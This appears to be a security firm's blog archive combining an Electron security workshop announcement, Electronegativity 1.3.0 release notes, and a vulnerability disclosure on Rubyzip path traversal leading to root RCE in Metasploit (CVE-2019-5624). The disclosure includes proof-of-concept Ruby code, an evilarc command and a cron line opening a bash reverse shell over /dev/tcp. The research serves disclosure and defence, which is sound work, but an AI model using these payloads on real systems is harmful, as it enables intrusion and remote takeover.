Electron Security Workshop

2-Days Training on How to Build Secure Electron Applications

We are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-days workshop.

ElectronJS Logo

With the increasing popularity of the ElectronJs Framework, we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated. You need to know the framework, follow its evolution, and constantly update and devise in depth defense mechanisms to mitigate its deficiencies.

Our training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface. We will analyze what are the common root causes for misconfigurations and vulnerabilities. The class will be centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, nodeIntegration and sandbox bypasses, insecure preload bugs, prototype pollution attacks, affinity abuses and much more.

The class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Q&A panels to answer all questions attendees might have and potentially review their code.

If you’re interested, check out this short teaser:

Audience Profile

Who should take this course?

  • JavaScript and Node.js Developers
  • Security Engineers
  • Security Auditors and Pentesters

We will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and basic understanding of web application security (e.g. XSS) is required.

General Information

Attendees will receive a bundle with all material, including:

  • Workshop presentation (over 200 slides)
  • Code, exploits and artifacts of all exercises
  • Certificate of completion

This 2-days training is delivered in English, either remotely or on-site (worldwide).

Doyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors.

We’re a flexible security boutique and can further customize the agenda to your specific company’s needs.

Feel free to contact us at info@doyensec.com for scheduling your class!


Electronegativity 1.3.0 released!

After the first public release of Electronegativity, we had a great response from the community and the tool quickly became the baseline for every Electron app’s security review for many professionals and organizations. This pushed us forward, improving Electronegativity and expanding our research in the field. Today we are proud to release version 1.3.0 with many new improvements and security checks for your Electron applications.


We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. Now it counts over 40 checks, featuring a new advanced check system to help improve the tool’s detection capabilities in sorting out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:

  • Now every check has an importance and accuracy attribute which helps the auditor to determine the importance of each finding. Consequently, we also introduced some new command line flags to filter the results by severity (--severity) and by confidence (--confidence), useful for tailored Electronegativity integration in your application security pipelines or build systems.
  • We introduced a new class of checks called GlobalChecks which can dynamically set the severity and confidence for the findings or create new ones considering the inherit security risk posed by their interaction (e.g. cross-checking the nodeIntegration and sandbox flags value or the presence of the affinity flag used acrossed different windows).
  • Variable scoping analysis capabilities have been added to inspect the Function and Global variable content, when available.
  • A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r).
  • The newly introduced Electron’s component BrowserView is now supported, which is meant to be an alternative to the WebView tag. The tool now also detects the use of the nodeIntegrationInSubFrames experimental option for enabling NodeJS support in sub-frames (e.g. an iframe inside a webview object).
  • Various bug fixes and new checks! (see below)

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities.

Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Due to reusing the renderer process, certain webPreferences options will also be shared between the web pages even when you specified different values for them. This can lead to unexpected security configuration overrides:

Affinity Property Vulnerability

In the above demo, the affinity set between the two BrowserWindow objects will cause the unwanted share of the nodeIntegration property value. Electronegativity will now issue a finding reporting the usage of this flag if present.

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects if there are security patches available for the Electron version used by the target application. From this release we switched from manually updating a safe releases file to creating a routine which automatically fetches the latest releases from Electron’s official repository and determines if there are security patches available at each run.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki page.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site-scripting attacks and data injection attacks. If a CSP is detected, it will look for weak directives by using a new library based on the csp-evaluator.withgoogle.com online tool.

Read more on the CSP_GLOBAL_CHECK wiki page.

Dangerous JS Functions called with user-supplied data

Looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate with user-supplied input.

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Check for mitigations set to limit the navigation flows

Detects if the on() handler for will-navigate and new-window events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under full control to remote origins in case of accidental navigation.

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.

Detects if Electron’s security warnings have been disabled

The tool will check if Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling this warning may hide the presence of misconfigurations or insecure patterns to the developers.

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check if a setPermissionRequestHandler has been set.

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron’s security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind and that creating the right and robust tools to help this community is the first step towards improving the whole Electron’s ecosystem security stance.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella


On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself and the implication of such an issue in a popular piece of software - Metasploit.


Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376 where a different handling was implemented by the developers.

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe is defined a few lines before as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While the Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end
$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

Resulting in a file being created in /tmp/file.txt, which confirms the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase.

It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Thanks to the interpretation of the ../ by Pathname, the argument to Rubyzip’s Entry#extract call does not contain any path traversal payloads which results in a mistakenly supposed “safe” path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in zip.rb file (line 157) that is responsible for importing a Metasploit ZIP File:

 data.entries.each do |e|
      target = ::File.join(@import_filedata[:zip_tmp], e.name)
      data.extract(e,target)

As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

  1. Create a file with the following content:
    * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  2. Generate the ZIP archive with the path traversal payload:
    python evilarc.py exploit --os unix -p etc/cron.d/
  3. Add a valid MSF workspace to the ZIP file (in order to have MSF to extract it, otherwise it will refuse to process the ZIP archive)
  4. Setup two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
  5. Login in the MSF Web Interface
  6. Create a new “Project”
  7. Select “Import”, “From file”, chose the evil ZIP file and finally click the “Import” button
  8. Wait for the import process to finish
  9. Enjoy your reverse shell


Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract.

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage Input by user? Vulnerable to path traversal?
entry.extract(path) yes (path) yes
entry.extract(path) partially (path is concatenated) maybe
entry.extract() partially (entry name) no
entry.extract() no no

If you’re using Metasploit, it is time to patch. We look forward to seeing a msf module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict.

This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support.

If you’re interested in the topic, take a look at the following resources: